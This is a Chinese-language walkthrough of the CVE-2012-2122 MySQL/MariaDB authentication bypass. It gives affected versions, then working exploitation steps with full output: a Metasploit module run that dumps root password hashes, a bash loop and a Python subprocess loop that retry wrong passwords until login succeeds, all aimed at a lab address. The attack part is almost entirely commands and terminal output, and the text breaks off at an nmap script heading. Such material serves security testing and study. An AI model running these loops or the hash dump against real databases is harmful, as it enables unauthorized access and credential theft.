CVE-2012-2122-Mysql身份认证漏洞及利用
一、漏洞简介
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次。
受影响的产品:
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
二、漏洞危害
只要知道用户名,不断尝试就能够直接登入SQL数据库。
三、漏洞验证
1、metasploit
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump msf auxiliary(mysql_authbypass_hashdump) > infoName: MySQL Authentication Bypass Password Dump Module: auxiliary/scanner/mysql/mysql_authbypass_hashdumpLicense: Metasploit Framework License (BSD)Rank: Normal Disclosed: 2012-06-09Provided by: theLightCosine <theLightCosine@metasploit.com> jcran <jcran@metasploit.com>Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yesThe target address range or CIDR identifier RPORT 3306 yesThe target port (TCP) THREADS1yesThe number of concurrent threads USERNAME root yesThe useame to authenticate asDescription: This module exploits a password bypass vulnerability in MySQL inorder to extract the useames and encrypted password hashes from aMySQL server. These hashes are stored as loot for later cracking.References: https://cvedetails.com/cve/CVE-2012-2122/ OSVDB (82804) https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysqlmsf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 192.168.118.130RHOSTS => 192.168.118.130msf auxiliary(mysql_authbypass_hashdump) > run [+] 192.168.118.130:3306 - 192.168.118.130:3306 The server allows logins, proceeding with bypass test[*] 192.168.118.130:3306 - 192.168.118.130:3306 Authentication bypass is 10% complete[*] 192.168.118.130:3306 - 192.168.118.130:3306 Authentication bypass is 20% complete[*] 192.168.118.130:3306 - 192.168.118.130:3306 Successfully bypassed authentication after 207 attempts. URI: mysql://root:iTk@192.168.118.130:3306[+] 192.168.118.130:3306 - 192.168.118.130:3306 Successfully exploited the authentication bypass flaw, dumping hashes...[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9[+] 192.168.118.130:3306 - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9[*] 192.168.118.130:3306 - 192.168.118.130:3306 Hash Table has been saved: /root/.msf4/loot/20180829155507_default_192.168.118.130_mysql.hashes_835663.txt[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(mysql_authbypass_hashdump) >
2、Linux shell
root@kali:~# for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.118.130 ; doneERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)Welcome to the MariaDB monitor. Commands end with ; or \g.Your MySQL connection id is 1513Server version: 5.5.23 Source distributionCopyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MySQL [(none)]> MySQL [(none)]> select version();+-----------+| version() |+-----------+| 5.5.23|+-----------+1 row in set (0.00 sec)MySQL [(none)]>
3、Python
主要调用了subprocess.Popen执行shell命令:
#!/usr/bin/pythonimport subprocesswhile 1:subprocess.Popen("mysql -h 192.168.118.130 -u root mysql --password=blah", shell=True).wait()
具体执行过程:
root@kali:~# python test.py ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)Reading table information for completion of table and column namesYou can tu off this feature to get a quicker startup with -AWelcome to the MariaDB monitor. Commands end with ; or \g.Your MySQL connection id is 2697Server version: 5.5.23 Source distributionCopyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MySQL [mysql]>
4、nmap script(mysql-vuln-cve2012-2122):
